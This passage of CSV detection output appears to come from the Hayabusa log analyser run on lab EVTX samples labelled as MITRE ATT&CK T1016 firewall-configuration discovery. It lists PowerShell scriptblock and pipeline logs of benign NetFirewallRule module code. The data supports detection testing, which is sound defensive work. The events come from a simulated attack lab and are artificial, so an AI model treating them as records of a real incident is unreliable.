Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EdgeTraversalPolicy'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EdgeTraversalPolicy'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LooseSourceMapping')) { [object]$__cmdletization_value = ${LooseSourceMapping} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LooseSourceMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LooseSourceMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalOnlyMapping')) { [object]$__cmdletization_value = ${LocalOnlyMapping} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalOnlyMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalOnlyMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Owner')) { [object]$__cmdletization_value = ${Owner} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Owner'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Owner'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpType')) { [object]$__cmdletization_value = ${IcmpType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DynamicTarget')) { [object]$__cmdletization_value = ${DynamicTarget} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Program')) { [object]$__cmdletization_value = ${Program} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Program'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_m,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.661 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ethodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Program'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Package')) { [object]$__cmdletization_value = ${Package} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Service')) { [object]$__cmdletization_value = ${Service} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Service'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Service'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalUser')) { [object]$__cmdletization_value = ${LocalUser} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUser')) { [object]$__cmdletization_value = ${RemoteUser} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachine')) { [object]$__cmdletization_value = ${RemoteMachine} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteMachine'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteMachine'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Authentication')) { [object]$__cmdletization_value = ${Authentication} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Encryption')) { [object]$__cmdletization_value = ${Encryption} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OverrideBlockRules')) { [object]$__cmdletization_value = ${OverrideBlockRules} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetFirewallRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Show-NetFirewallRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetFirewallRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetFirewallRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetFirewallRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Enable-NetFirewallRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Disable-NetFirewallRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Show-NetFirewallRule { [CmdletBinding(PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])][OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement')] param( [Parameter(ParameterSetName='EnumerateFull1')] [string] ${PolicyStore}, [Parameter(ParameterSetName='EnumerateFull1')] [string] ${GPOSession}, [Parameter(ParameterSetName='EnumerateFull1')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='EnumerateFull1')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='EnumerateFull1')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Dependents'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameter.ParameterTypeName = 'Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement' $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('EnumerateFull', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] 